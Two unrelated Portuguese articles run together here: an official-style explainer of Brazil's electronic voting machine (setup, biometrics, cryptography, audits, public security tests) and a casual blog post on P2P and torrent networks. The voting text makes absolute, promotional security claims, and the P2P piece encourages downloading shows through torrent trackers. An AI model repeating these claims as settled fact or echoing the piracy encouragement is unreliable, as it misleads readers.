O sistema como um todo tem início com a compilação   do   código-fonte.   Uma   equipe   de técnicos do TSE insere as chaves e as rotinas criptográficas. Encerrada a compilação dos programas tem início a  preparação dos  pacotes, que contém todos os programas utilizados na urna eletrônica. Estes pacotes são cifrados e enviados aos Tribunais Regionais Eleitorais juntamente com o cadastro nacional de todos os eleitores.

A última etapa percorrida pelo software para chegar à urna eletrônica é feita por meio do flash card. No processo de inseminação de informações o flash card de carga é inserido no slot de flash externo e a urna é ligada. A inicialização da urna é feita a partir do flash card externo e é seguida da execução de programas que formatam o flash card interno e copiam os arquivos de aplicação, os arquivos do sistema operacional e os arquivos de controle. A urna é então desligada e o flash card de carga é substituído pelo flash card de votação e juntamente a esse flash é inserida uma memória de resultado de votação e a urna é ligada novamente.

São realizados então, vários procedimentos de verificação de integridade do hardware e do software.

Não sendo encontrados problemas, a urna é desligada, lacrada e está pronta para ser utilizada no dia da votação!

Segundo turno

Para o segundo turno de uma eleição não é dada nova carga na urna. O programa aplicativo é o mesmo utilizado no primeiro turno da eleição, sendo necessário apenas informar a nova lista de candidatos. A preparação da urna é feita apenas através de uma nova memória de resultado específica que contém as informações dos candidatos que concorrem ao segundo turno.

Todas as urnas eletrônicas utilizam o mesmo programa de votação. O que difere uma urna da outra são os dados nelas inseridos, tais como:

  • designação do município, zona e seção eleitoral;
  • tabelas de partidos e candidatos que disputam a eleição em tal seção eleitoral;
  • tabelas de eleitores da seção;
  • fotos dos candidatos.

 O terminal do mesário e o terminal do eleitor

Dois terminais compõem a urna: o terminal do mesário, no qual o eleitor é identificado e autorizado a votar. Observando-se que nos modelos de urna a partir de 2009, a identidade pode ser verificada por meio da biometria. E o terminal do eleitor, onde o voto é registrado numericamente.

O terminal do mesário é posicionado próximo ao presidente da mesa, sendo constituído por um teclado numérico que vai do 0 ao 9, as teclas “confirma”  e  “corrige”,  um  visor  de  cristal líquido e as teclas de sinalização que indicam quando a urna está sendo alimentada por energia externa ou interna, além de indicar ainda se a urna está sendo utilizada por algum eleitor ou se ela já está liberada para o próximo. É   ainda   no   terminal   do   mesário   que   o presidente da seção eleitoral digita o número do título de eleitor e, confirmada a sua identidade, o autoriza a votar. Nas seções onde há identificação biométrica, antes da habilitação, o eleitor tem sua identidade validada pela urna, dessa forma, um eleitor não pode votar por outro.

O presidente da mesa também digita a senha de encerramento da votação no terminal do mesário.

Quando a senha de encerramento é confirmada, o terminal do eleitor imprime, automaticamente, a 1ª via do Boletim de Urna (B.U.) Se a impressão estiver correta, o presidente da mesa aperta a tecla “confirma” no terminal do eleitor e, enquanto são emitidas as outras quatro vias obrigatórias do B.U., os dados da votação são gravados na memória de resultado que servirá para a exportação dos dados daquela seção.

No terminal do eleitor encontra-se a tela de cristal líquido, onde são visualizadas as instruções para o eleitor, bem como durante a votação, o nome, número, partido e foto do candidato escolhido. Também encontramos no terminal do eleitor um teclado numérico com teclas de 0 a 9, além das teclas “branco”, “corrige” e “confirma”.

Três pequenos sinais visuais (Ieds) auxiliam o mesário, informando-o se o terminal está disponível para o eleitor, se já completou seu voto e se a urna eletrônica está funcionando ligada à corrente elétrica ou à bateria interna.

Já o terminal do eleitor possui teclado numérico, onde é registrado o voto, e uma tela de cristal líquido, onde são registradas as mensagens que orientam o eleitor para o registro de seu voto.

 

A urna funciona ligada à rede de energia elétrica, seja ela 110V ou 220V. Se faltar energia no dia da eleição, cada urna possui uma bateria interna com capacidade para funcionamento de 12 horas.

E se ainda não for suficiente, a urna poderá ser ligada a uma bateria de carro!

Outros dispositivos da urna eletrônica

Além do teclado e do monitor de vídeo, a urna também possui:

  • uma impressora, utilizada para imprimir os boletins de urna;
  • um drive para Memória de Resultado;
  • dois slots para inserção de cartão de memória do tipo flash, que são denominadas de flash interna e flash externa;
  • um conector para teclado;
  • dois conectores USB;
  • um conector para fone de ouvido, usado por eleitores com deficiência visual;
  • um conector para conexão com outros terminais de eleitor e um conector para impressora (estes dois estão instalados no microcomputador utilizado pelos mesários).

Biometria

A palavra biometria vem do grego: bios (vida) e metron (medida). Designa um método automático de reconhecimento individual baseado em medidas biológicas (anatômicas e fisiológicas) e características comportamentais.

As biometrias mais implementadas, ou estudadas, incluem as impressões digitais, reconhecimento de face, íris, assinatura e até a geometria das mãos. Porém, muitas outras modalidades estão em diferentes estágios de desenvolvimento e estudos. As impressões digitais, por exemplo, vêm sendo usadas por mais de um século, enquanto a íris é objeto de estudo há pouco mais de uma década. Não existe ainda uma modalidade biométrica que se aplique em todas as situações.

Muitos fatores devem ser levados em conta para se  implantar um sistema biométrico, tais como localização, riscos de segurança e número de usuários, entre outros.

Todo sistema biométrico é preparado para reconhecer,  verificar ou  identificar uma pessoa que foi previamente cadastrada.

Na biometria, o procedimento de verificação ocorre quando o sistema confirma uma possível identidade comparando apenas parte da informação com o todo disponível. Já o processo de  identificação  confirma a  identidade  de  um indivíduo, comparando o dado fornecido com todo o banco de dados registrado.

A biometria é usada em inúmeros lugares para melhorar a segurança ou conveniência dos cidadãos. No Brasil, a emissão de passaporte, de carteiras de identidade e o cadastro das Polícias Civil e Federal contam com sistemas biométricos.

Além disso, muitas empresas adotam tais sistemas para acesso às suas instalações ou utilização de seus serviços. É o caso de algumas academias de ginástica que usam a leitura da impressão digital para controlar o acesso dos seus frequentadores.

Para o reconhecimento individual são coletados dados biométricos por meio de sensores que os colocam em formato digital. Quanto melhor a qualidade do sensor, melhor será o reconhecimento alcançado. No  caso do cadastramento que será efetuado pela Justiça Eleitoral, os  dados serão coletados por um scanner de alta definição.

Votação em urna com leitor biométrico

Com a adoção da nova tecnologia de identificação por meio dos dados biométricos os eleitores mal notaram as mudanças na hora de votar.  Isso  porque  a  urna  com leitor biométrico informatizou um procedimento operacional: a liberação das urnas não mais é feita pelos  mesários, mas sim pela leitura das  impressões digitais do próprio eleitor. É a tecnologia a serviço da segurança do voto e da lisura do processo eleitoral.

Produtos gerados pela urna

A urna eletrônica somente grava a indicação de que o eleitor já votou. Pelo embaralhamento interno e outros mecanismos de segurança, não há nenhuma possibilidade de se verificar em quais candidatos um eleitor votou, em respeito à Constituição Federal brasileira, que determina o sigilo do voto.

Após o encerramento da votação, são gravados na Memória de Resultado da urna eletrônica os seguintes arquivos:

  1. a) Boletim de urna;
  1. b) Registro digital do voto;
  1. c) Eleitores faltosos;
  1. d) Justificativas eleitorais;
  1. e) Registro de eventos (Log).

 

Todos os arquivos são assinados digitalmente. O Boletim de urna e o registro digital do voto, além de assinados, são criptografados.

Contingências

Caso ocorra algum problema com a urna eletrônica durante a votação, serão adotados procedimentos de contingência para saná-lo.

Procedimentos de contingência: a Justiça Eleitoral prevê a adoção de procedimentos que visam sanar problemas apresentados na urna eletrônica durante a votação, apuração ou ainda falhas operacionais cometidas pelos mesários. Esses procedimentos são conhecidos como contingências de Votação e Apuração e nem sempre são capazes de resolver todas as situações. Por isso, existe a possibilidade de se ter votação totalmente manual (com a utilização de cédulas e urna convencional) ou votação mista (parte eletrônica e parte manual).

Contingências de votação: esses procedimentos utilizam urnas e flash cards previamente preparados para esse fim e, em último caso cédulas de votação em papel.

Urna de Contingência: na fase de preparação das urnas, na audiência de carga e lacre, algumas são preparadas para essa finalidade, são as “urnas de contingência”. Essas urnas são utilizadas para substituir aquelas que apresentarem defeitos durante a votação. No ato da substituição o flash card e a memória de resultado de votação são transferidos da urna com defeito para esta urna, havendo dessa forma uma migração dos votos já registrados para a urna de contingência que é lacrada e passa a ser a urna da seção.

Flash de Contingência: este procedimento é utilizado quando o procedimento de urna de contingência foi utilizado, mas não resolveu o problema. Consiste na utilização de um flash previamente preparado para essa função, no processo de geração de mídias, em substituição do flash de votação da urna que apresentou problemas. Após a troca, a urna é novamente lacrada.

Votação manual: na  situação  em  que  tanto a  adoção  da  urna  de  contingência e  do  flash  de contingência não consigam sanar o problema não resta alternativa a não ser a utilização da votação manual (por cédulas).

Encerrar Votação na Junta Eleitoral: este procedimento é utilizado para encerrar a votação quando por falha operacional, o mesário desligou a urna sem executar a rotina de encerramento da votação.

Recuperar Dados Para a Totalização: Este procedimento de contingência é utilizado quando não foi possível a leitura da mídia gerada na urna eletrônica para o totalizador ou quando o dado lido foi rejeitado na fase de processamento de boletim de urna no totalizador. Nessa situação o sistema recuperador de dados (RED) gera uma nova memória de resultado a partir da urna originária.

Recuperar Dados Para o Sistema de Apuração (SA): Este procedimento é utilizado para recuperar dados parciais (votos lançados na urna eletrônica) em caso de votação mista, para posterior computação desses votos com aqueles registrados em cédulas, no Sistema de Apuração.

Vantagens do uso da urna eletrônica

A urna eletrônica detém uma série de vantagens. A principal delas, sem dúvida, é impedir fraudes. Além disso, pode-se citar:

  • Os partidos concorrentes ao pleito recebem, previamente, os programas de computador que serão utilizados, podendo, inclusive, constituir sistema próprio de fiscalização, apuração e totalização dos resultados. Alem disso, fiscais e delegados de partidos podem acompanhar o procedimento de geração do flash card de carga e do flash card de votação.
  • Às 7h30min do dia da eleição, o presidente da mesa receptora de votos emite a “zerézima” na presença dos fiscais de partidos políticos, que é um documento impresso pela urna contendo a relação de todos os concorrentes ao pleito e com zero votos para cada um, provando que não há qualquer voto registrado naquela urna.

destaque para o teclado em Braile

  • O sistema eletrônico impede que o eleitor vote mais de uma vez, pois o número do título é bloqueado após a primeira votação.
  • Com o voto  eletrônico  acaba  a  subjetividade  para  identificar a vontade do eleitor. No processo manual são as juntas apuradoras que interpretam votos que não estão claros.
  • Em cada tecla da urna, o eleitor encontrará a gravação do respectivo número em código internacional Braile. O deficiente visual que não lê em Braile poderá votar guiando-se pelo número 5, central, ressaltado no teclado através de uma pequena barra, logo abaixo do número, na própria tecla.
  • Ao encerrar-se a votação, cada urna expede o seu boletim de urna

(BU) com todos os votos já apurados, ou seja, o resultado da eleição naquela urna é imediato.

  • O eleitor pode conferir, também pela foto, o candidato em que vota.
  • O flash card é uma mídia altamente confiável e duradoura, com gravação e leitura de dados eletrônica.
  • Para quem está fora do seu domicílio eleitoral no dia da eleição, basta apresentar o Requerimento de Justificativa Eleitoral em qualquer local de votação (no mesmo horário da votação) e a ausência é justificada, na própria urna eletrônica, pelo mesário.

Segurança da Urna Eletrônica

O processo eletrônico de votação possui mecanismos imprescindíveis para assegurar sua segurança: a assinatura digital e o resumo digital.

A assinatura digital é uma técnica criptográfica para garantir que um conteúdo, no caso um arquivo digital, possa ser verificado principalmente no que se refere à sua integridade, isto é, busca garantir que  o  programa de  computador não  foi  modificado de  forma intencional ou  não  perdeu  suas características originais por falha na gravação ou leitura. Isso significa que se a assinatura digital for válida, o arquivo não foi modificado.

A assinatura  digital também é  utilizada para  assegurar  a  autenticidade do  programa, ou  seja, confirmar que o programa tem origem oficial e foi gerado pelo Tribunal Superior Eleitoral. Neste caso, somente quem assinou digitalmente pode ter gerado aquela assinatura digital.

Já o resumo digital, também chamado de resumo criptográfico ou hash, é uma técnica criptográfica que se assemelha a um dígito verificador. Dado um arquivo digital, pode-se calcular o resumo digital desse arquivo com um algoritmo público (método matemático conhecido por todos). No caso dos sistemas de urna, são calculados os hashs de todos os arquivos e esses resumos são publicados no Portal do TSE.

Assinatura digital e lacração

Onde: TSE.

Quando: Até 20 dias antes da eleição.

Quem: Partidos políticos, Ordem dos Advogados do

Brasil (OAB) e Ministério Público (MP).

O que é apresentado: A versão final dos sistemas eleitorais; Códigos-fonte e executáveis; Manuais; Documentação.

Processos:   É   efetuada   a   compilação   dos   programas   computacionais   na   presença   dos representantes, bem como a geração de resumos digitais (hashes) dos programas. É dada permissão, aos representantes, para assinar digitalmente os sistemas eleitorais, com programa próprio, para posterior verificação (resolução-TSE). Além disso, os sistemas (fontes e executáveis) são assinados digitalmente pelo  TSE,  gravados  em  mídia  não  regravável,  lacrados  e  armazenados  no  cofre. Os representantes poderão apresentar impugnação fundamentada ao TSE.

Entregas:

São entregues aos representantes dos partidos políticos, OAB e MP:

– Resumos digitais (hashes) de todos os sistemas, também publicados na Internet;

– Memória de resultado de verificação de assinatura digital para microcomputador, urna e servidor. Após a lacração, ocorrem os seguintes eventos:

– Os sistemas são distribuídos pela rede privativa da Justiça Eleitoral aos TREs;

– Os sistemas eleitorais só funcionam nos computadores da Justiça Eleitoral;

– Os sistemas são ativados por meio de senhas geradas pelo TSE.

Por uma questão de segurança, os sistemas eleitorais só funcionam nos computadores da Justiça Eleitoral.  Desta  forma, mesmo que  os  sistemas  sejam  interceptados,  não  há  possibilidade  de instalação dos arquivos em computadores externos.

Os sistemas são ativados por meio de senhas geradas pelo TSE, ou seja, além de só funcionarem em computadores da Justiça Eleitoral, é necessário ainda o uso de senha para ativação do sistema. As senhas são geradas somente pelo Tribunal Superior Eleitoral, de forma personalizada e controlada, e distribuídas para todo o Brasil.

Criptografia

A criptografia digital é um mecanismo de segurança para o funcionamento dos programas computacionais. Como os dados tornam-se “embaralhados”, eles ficam inacessíveis a pessoas não autorizadas.

O  Tribunal Superior Eleitoral usa  algoritmos de cifração simétrica e assimétrica proprietários, de conhecimento exclusivo do TSE.

O boletim de urna é criptografado de forma segmentada, assinado digitalmente e transmitido.

Além da criptografia, existe a decriptografia que é o processo pelo qual são recuperados os dados previamente criptografados, isto é, eles são “desembaralhados”. É um mecanismo de segurança para o funcionamento dos programas computacionais.

No recebimento do boletim de urna ocorrem:

– Validação da compatibilidade da chave pública de assinatura digital do boletim de urna com a chave privada do Totalizador;

– Decriptografia do boletim de urna de forma segmentada;

– Leitura do boletim de urna decriptografado;

– Armazenamento do boletim de urna criptografado e decriptografado.

Segurança em camadas

A segurança do sistema eletrônico de votação é feita em camadas. Por meio de dispositivos de segurança de tipos e com finalidades diferentes, são criadas diversas barreiras que, em conjunto, não permitem que alguém ataque o sistema como um todo. Em resumo, qualquer ataque ao sistema causa um efeito dominó e a urna eletrônica trava, não sendo possível gerar resultados válidos.

Segurança do processo

O processo eletrônico de votação possui vários mecanismos de segurança: assinatura digital, criptografia, resumo digital (hash) e a tabela de correspondência de todas as urnas utilizadas.

Auditoria

É possível realizar auditoria do processo eleitoral sob diversos aspectos, a saber:

A partir da identificação dos locais a serem auditados e da apresentação de pedido fundamentado, os seguintes procedimentos são de possível execução:

– Verificação do resumo digital (hash);

– Reimpressão do boletim de urna;

– Comparação entre o boletim impresso e o boletim recebido pelo sistema de totalização;

– Verificação de assinatura digital;

– Comparação dos relatórios e atas das seções eleitorais com os arquivos digitais da urna;

– Auditoria do código-fonte lacrado e armazenado no cofre do TSE;

– Recontagem dos votos por meio do Registro Digital do Voto (RDV);

– Comparação da recontagem do RDV com o boletim de urna.

Auditorias

Ao longo dos 12 anos de utilização do sistema informatizado de voto, várias auditorias e perícias já foram realizadas. Em 2002, a Unicamp concluiu que “o sistema eletrônico de votação atende às exigências     fundamentais     do     processo eleitoral, ou seja, o respeito à expressão do voto do eleitor e a garantia do seu sigilo”.

Em 2008, a Polícia Federal, no laudo técnico sobre  as  eleições municipais de  2008  em Caxias (MA), descartou todas as suspeitas de fraude nas urnas eletrônicas.

No mesmo ano, o TSE contratou a Fundação de  Apoio à  Capacitação em Tecnologia da Informação (FACT), com aprovação do Centro de Tecnologia da Informação Renato Archer, para a prestação de serviços especializados de suporte na especificação de programas a serem aplicados no sistema eletrônico de votação brasileiro, com foco na melhoria da segurança e na redução dos custos.

O objetivo do TSE com a contratação de especialistas é garantir à urna características ergonômicas, de interferência eletromagnética, de estabilidade e confiabilidade do hardware e de economia na compra de plataformas cada vez mais adequadas.

Testes de segurança

Com  o  objetivo  de  contribuir  para  o  aperfeiçoamento do  software e/ou  do  hardware  da  urna eletrônica, demonstrando a transparência do sistema, o TSE já realizou duas edições dos Testes Públicos de Segurança do Sistema Eletrônico de Votação, em que investigadores inscritos apresentaram e executaram planos de “ataque” aos componentes externos e internos da urna.

Em ambas oportunidades foram selecionadas, por comissão avaliadora composta por acadêmicos e cientistas, as  melhores propostas de  ataque que  puderam contribuir para  o  aprimoramento da segurança e da confiabilidade do sistema eletrônico de votação.

A primeira edição foi realizada entre 10 e 13 de novembro de 2009. Nenhum dos testes conseguiu violar a urna e os programas colocados à prova. No entanto, as ideias apresentadas pelos especialistas contribuíram para o aperfeiçoamento tecnológico da votação.

Nos testes de 2009, foram premiados os seguintes especialistas: 1º lugar – Sérgio Freitas da Silva, 2º lugar – Fernando Andrade Martins de Araújo e equipe da Controladoria-Geral da União e 3º lugar – Antonio Gil Borges de Barros e equipe da Cáritas Informática.

Sérgio, que foi premiado com R$ 5 mil, tentou violar o sigilo do voto por meio da captação de ondas eletromagnéticas emitidas pelas teclas da urna durante a digitação.

Em segundo lugar, foi premiado com R$ 3 mil o grupo de técnicos da CGU (Controladoria Geral da União), que analisou procedimentos relativos à preparação do pleito e apresentou diversas sugestões ao TSE.

Em terceiro lugar, com prêmio de R$ 2 mil, ficou a equipe da empresa Cáritas Informática, que testou tanto procedimentos de preparação do pleito quanto a urna e os softwares de votação.

Já a segunda edição dos testes foi realizada de 20 a 22 de março de 2012, sendo que os investigadores puderam participar de uma fase de preparação, na qual tiveram acesso ao código-fonte da urna eletrônica e puderam se inteirar ainda mais sobre as peculiaridades do sistema.

Os três grupos de investigadores que apresentaram as três melhores contribuições na segunda edição dos testes receberam certificados.

O  segundo  e  terceiro  colocados  não  obtiveram sucesso  nos  testes  propostos,  mas  apontaram contribuições de aprimoramento do sistema. Em segundo lugar ficou o grupo da Universidade Federal de Uberlândia, que tentou inicializar a urna com um sistema operacional diferente do desenvolvido pela Justiça Eleitoral e recuperar dados da memória da urna eletrônica por meio do uso de spray congelante.

O terceiro colocado foi o grupo do Instituto Sapientia. O desafio deste grupo era clonar um cartão de memória com os dados de votação da urna eletrônica.

Votação Paralela

A votação paralela é uma auditoria que ocorre no dia das eleições e para a qual são convidados fiscais de partidos políticos e coligações, representantes da Ordem dos Advogados do Brasil, bem como entidades representativas da sociedade. É realizada em local designado pelos tribunais regionais eleitorais, após  o  sorteio de  duas  a  quatro urnas  eletrônicas na  véspera  da  eleição. Simultaneamente à votação oficial é apresentada auditoria de verificação do funcionamento das urnas eletrônicas.

Antes da eleição, no mínimo 500 cédulas de votação são entregues aos representantes dos partidos políticos que participarão do evento e preenchidas por eles. Em seguida, as cédulas são colocadas em urnas de lona lacradas. A Comissão de Votação Paralela, instituída previamente, deve se preparar para a possibilidade de os partidos não entregarem a quantidade necessária de cédulas para o procedimento, acertando com alguma escola ou entidade o preenchimento das mesmas, já que, em hipótese alguma, as cédulas devem ser preenchidas por servidores da Justiça Eleitoral.

Simultaneamente à eleição oficial ocorre o processo de votação paralela, que funciona da seguinte forma: os participantes recolhem uma cédula da urna de lona lacrada, revelam aos fiscais e demais presentes os candidatos escolhidos e, em seguida, digitam os números correspondentes no Sistema de Apoio à Votação Paralela e na urna eletrônica. Todo o processo é fiscalizado e filmado.

A fiscalização da votação paralela ocorre por meio de:

Voto em Trânsito

Em 2010 o voto em trânsito foi implementado, possibilitando ao eleitor exercitar seu direito de voto,  mesmo não  estando  em  seu  domicílio eleitoral. Embora fique esse direito limitado às Eleições Gerais e apenas nas capitais dos Estados. Segue abaixo as resoluções de 2010 sobre o tema em questão:

Resolução TRE nº 23.215, de 02.03.2010. Dispõe sobre o voto em trânsito na eleição presidencial de 2010. Alterada pela Resolução TSE nº 23.322, de 19.8.2010.

Art. 4º Os eleitores habilitados para votar em trânsito terão seus  nomes excluídos da  urna eletrônica, passando a constar, exclusivamente, da urna das seções especialmente instaladas para este fim.

Parágrafo único. Os nomes dos eleitores habilitados em trânsito serão identificados no caderno de votação da seção de origem, com a indicação de que se habilitaram para votar em uma capital.

Art. 5º O eleitor que não comparecer à seção para votar em trânsito deverá justificar a sua ausência em qualquer Mesa  Receptora de  Justificativas, inclusive no  seu  domicílio eleitoral de  origem, à exceção da capital do Estado por ele indicada no requerimento de habilitação.

Parágrafo único. O eleitor habilitado para votar em trânsito que comparecer, no dia da votação, à sua seção eleitoral de origem será informado pelo Presidente da Mesa sobre a impossibilidade de votar e a necessidade de realizar a justificação na forma prevista no caput.

Art. 6º Caberá aos Tribunais Regionais Eleitorais cadastrar, em aplicativo desenvolvido pelo Tribunal Superior Eleitoral, as seções especiais e os locais, nas respectivas capitais dos Estados, onde serão instaladas urnas para a recepção dos votos dos eleitores em trânsito, denominadas “Mesas Receptoras de Voto em Trânsito”.

  • 1º As Mesas Receptoras de Voto em Trânsito funcionarão nos lugares designados pelos Tribunais Regionais Eleitorais, os quais deverão ser publicados até 5 de setembro de 2010, no Diário de Justiça Eletrônico.

Art. 12.  Os Tribunais Regionais Eleitorais que constituírem seções especiais para o voto em trânsito deverão  incluir  as  urnas  eletrônicas  destinadas  a  esse  fim no  quantitativo de  urnas  a  serem submetidas a sorteio para a verificação por meio de votação paralela.

Resolução TRE nº 844, de 29.7.2010. Designa a Zona Eleitoral e o local onde será instalada seção especial destinada à recepção do voto em trânsito, nas eleições de 2010 (Resolução nº 23.215/2010 do TSE).

“CONSIDERANDO que, nas eleições de 2010, os eleitores em trânsito no território nacional poderão votar, no primeiro e/ou segundo turnos, para Presidente e Vice-Presidente da República, em urnas especialmente instaladas nas  capitais dos  Estados  (Código Eleitoral, art. 233-A, e  Resolução nº

23.215/2010, art. 1º);”

“Art. 3º Caberá ao Tribunal Superior Eleitoral totalizar os votos recebidos das Mesas Receptoras de

Voto em Trânsito de todas as capitais (Resolução nº 23.215/2010, art. 11).”

Fonte: http://www.justicaeleitoral.jus.br/arquivos/tre-mg-funcionamento-urna

O que é P2P e como ela funciona?

Alguma vez você já parou para pensar como aquele último episódio da sua série favorita foi parar na sua casa e você pode assistir? Veja aqui como funciona a incrível tecnologia das redes P2P, utilizada, por exemplo, pelos programas de torrents.

Primeiro vamos explicar o que significa esse nome/sigla: P2P significa Peer to Peer e o 2 da sigla é um trocadilho com a palavra two (2 em inglês), já em português, significa par a par.

O nome se refere ao formato à disposição dos computadores interligados à rede, onde cada computador conectado realiza as funções de cliente e servidor ao mesmo tempo, dessa forma, tudo é descentralizado, sem um único servidor centralizado que detenha o arquivo e precisa se encarregar de enviar todos os milhares de pedidos ao mesmo tempo.

Ficou complicado entender o que é cliente e servidor? Eu explico: Cliente é o nome dado ao pc que pede algo à rede, e servidor aquele que envia o pedido. Como não existe um servidor dedicado, veja que nenhum servidor de torrent armazena sequer um arquivinho, os arquivos estão na sua máquina, na minha, na do seu vizinho, naquela do japonês enlouquecido que só estuda, enfim, em qualquer local do mundo. Aqui está a genialidade deste tipo de conexão: Não há uma única fonte para o seu download (como acontece quando você baixa algo de um site), há milhões de fontes só esperando sua conexão.

O serviço P2P cria uma rede virtual entre as máquinas conectadas no momento e vasculha o HD do usuário atrás da música, vídeo ou qualquer outro documento que a pessoa esteja baixando. Além disso, o que torna a rede P2P tão eficiente é que você pode começar a baixar de uma fonte, e no momento em que esta fonte desligar sua máquina e interromper a conexão, o download recomeçará de onde parou, a partir dos dados cedidos por um outro usuário, se este novo usuário também desconectar, o processo se repetirá, ad eternum, até você completar o download.

À esquerda uma conexão convencional, à direita, uma conexão P2P

À esquerda uma conexão convencional, à direita, uma conexão P2P

Outro ponto positivo: o número de conexões efetivadas pelo sistema varia de acordo com a sua largura de banda, ou seja, quanto mais velocidade de internet, mais conexões com outros usuários, e, assim, mais velocidade de download. A rede P2P não limita a velocidade de suas transferências, somente se você quiser que ela faça isso. Mas e como funciona essa coisa de baixar um pouco de um, um pouco de outro, etc. não dá erro? Não, pois neste tipo de conexão, os arquivos a serem transferidos são divididos em pequenos pedaços e então compartilhados. Os pedaços são sempre os mesmos para a música X, ou jogo Y. Funciona assim: Você baixa um desses pedaços de arquivo e, logo após, você imediatamente passa a distribuí-lo aos outros usuários que estão fazendo o download do mesmo arquivo. Assim, evitam-se gargalos na transmissão dos dados e permite que mesmo aquela pessoa com uma conexão lenta de transferência consiga repassar o arquivo para milhares de pessoas.

Exemplificando um pouco mais: Com esse sistema de envio um usuário pode baixar até a parte 50 do seu vizinho de prédio, a parte 3453 de um mexicano e os últimos 10% de um russo louco da vodka, por exemplo. No final, o programa que você usar para baixar os arquivos irá juntar tudo em ordem e voilá: seu download estará completo na sua máquina esperando pela execução.

Veja que estou fazendo um download em minha máquina. No total o arquivo tem quase 10gb, mas veja minhas conexões: Estou pegando dados de brasileiros, japoneses, americanos, canadenses, italianos, argentinos, etc. tudo ao mesmo tempo, e é isso que me permite uma maior velocidade. De alguns eu copio o que preciso mais rapidamente, de outros, bem devagarinho, no final, a soma dá uma boa velocidade. Aaah, e notem que eu também estou enviando o mesmo arquivo (os 13% que eu já tenho) para os outros usuários que precisam destes pedaços. Deu para entender? Eu estou sendo neste momento cliente e servidor. É um verdadeiro trabalho de formiguinha, no qual a cooperação é de suma importância.

E para exemplificar o que estávamos falando antes, sobre repartir o arquivo em pedaços, este que estou baixando tem 1241 partes de 8mb cada.

Diversas formas de compartilhamento operam neste tipo de conexão: Kademlia, Torrent, Gnutela, Kad Network, SoulSeek, etc. e ela não é nova. Se você, por exemplo, já usou o Kazaa, o Emule, Ares, etc. já esteve conectado à rede P2P sem nem saber. Ela surgiu em 1999, quando o estudante Shawn Fanning lançou o Napster, inaugurando esse novo tipo de conexão e dando o pontapé inicial na era do compartilhamento de conteúdo em grande escala.

RELACIONADO A conturbada história do Pirate Bay Entre os programas que operam este tipo de conexão podemos citar vários, que desde 1999 fazem ou já fizeram muito sucesso – e polêmica (clique no link à direita e leia sobre os problemas legais enfrentados pelo The Pirate Bay). Alguns se conectavam em mais de uma rede, por exemplo, como o Emule, que se conectava à rede P2P e Kad, e foi muito popular no Brasil lá por 2003 ~ 2005, assim como o Kazaa, etc. No entanto, hoje, o mais seguro e eficiente é sem dúvidas, algum cliente torrent, como o uTorrent, programinha de menos de 1MB que permite aos seus usuários a conexão entre milhares de pc’s pelo mundo e o tráfego ilimitado de dados, com segurança e agilidade. O download pode ser feito na página oficial do desenvolvedor, clicando aqui. Depois que você instalar o programinha em sua máquina visite o tracker (local onde estão catalogados os torrents) para buscar algo a ser baixado. O melhor, na minha humilde opinião, pode ser acessado clicando aqui.

E os benefícios da rede não se restringem somente ao compartilhamento de arquivos e mídias digitais. Você sabe, por exemplo, o porquê do Skype realizar de forma tão barata uma ligação telefônica de São Paulo para Berlim, na Alemanha? É que os dados de voz são transmitidos através de uma rede P2P, que é infinitamente mais barata de ser mantida e operada do que uma rede telefônica, seja ela conectada somente por fios, ou com satélites.

Convencidos de que o P2P é um bem para a humanidade? Então, aos downloads, e por fim, algo MUITO importante: Não deixe de compartilhar aquilo que você baixou de alguém, só assim a internet sobrevive. Compartilhar é amor <3